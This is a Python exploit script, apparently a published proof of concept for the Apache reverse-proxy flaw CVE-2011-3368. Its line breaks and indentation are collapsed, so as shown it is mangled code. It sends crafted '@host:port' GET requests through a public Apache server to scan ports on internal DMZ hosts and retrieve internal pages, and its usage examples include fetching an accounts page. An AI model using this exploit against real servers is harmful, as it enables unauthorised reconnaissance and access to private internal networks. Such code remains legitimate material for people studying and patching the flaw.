#!/usr/bin/env pythonimport socketimport stringimport getopt, sysknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"get = get + "Host: " + apache_target + "\r\n\r\n"remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)remoteserver.settimeout(3)try:remoteserver.connect((apache_target, int(apache_port)))remoteserver.send(get)return remoteserver.recv(4096)except:return ""def get_banner(result):return result[string.find(result, "\r\n\r\n")+4:]def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)for port in tested_ports:port = str(port)result = send_request(url, apache_target, apache_port, internal_target, port, resource)if string.find(result,"HTTP/1.1 200")!=-1 or \string.find(result,"HTTP/1.1 30")!=-1 or \string.find(result,"HTTP/1.1 502")!=-1:print "- Open port: " + port + "/TCP"print get_banner(result)elif len(result)==0: print "- Filtered port: " + port + "/TCP"else: print "- Closed port: " + port + "/TCP"def usage():printprint "CVE-2011-3368 proof of concept by Rodrigo Marcos"print "http://www.secforce.co.uk"printprint "usage():"print "python apache_scan.py [options]"printprint " [options]"print "-r: Remote Apache host"print "-p: Remote Apache port (default is 80)"print "-u: URL on the remote web server (default is /)"print "-d: Host in the DMZ (default is 127.0.0.1)"print "-e: Port in the DMZ (enables 'single port scan')"print "-g: GET request to the host in the DMZ (default is /)"print "-h: Help page"printprint "examples:"print " - Port scan of the remote host"print "python apache_scan.py -r www.example.com -u /images/test.gif"print " - Port scan of a host in the DMZ"print "python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"print " - Retrieve a resource from a host in the DMZ"print "python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"printdef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):printprint "CVE-2011-3368 proof of concept by Rodrigo Marcos"print "http://www.secforce.co.uk"printprint " [+] Target: " + apache_targetprint " [+] Target port: " + apache_portprint " [+] Internal host: " + internal_targetprint " [+] Tested ports: " + str(tested_ports)print " [+] Internal resource: " + resourceprintdef main():global apache_targetglobal apache_portglobal urlglobal internal_targetglobal internal_portglobal resourcetry:opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])except getopt.GetoptError:usage()sys.exit(2)try:for o, a in opts:if o in ("-h", "--help"):usage()sys.exit(2)if o == "-u":url=aif o == "-r":apache_target=aif o == "-p":apache_port=aif o == "-d":internal_target = aif o == "-e":internal_port=aif o == "-g":resource=aexcept getopt.GetoptError:usage()sys.exit(2)if apache_target == "":usage()sys.exit(2)url = "/"apache_target = ""apache_port = "80"internal_target = "127.0.0.1"internal_port = ""resource = "/"main()if internal_port!="":tested_ports = [internal_port]else:tested_ports = known_portsscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)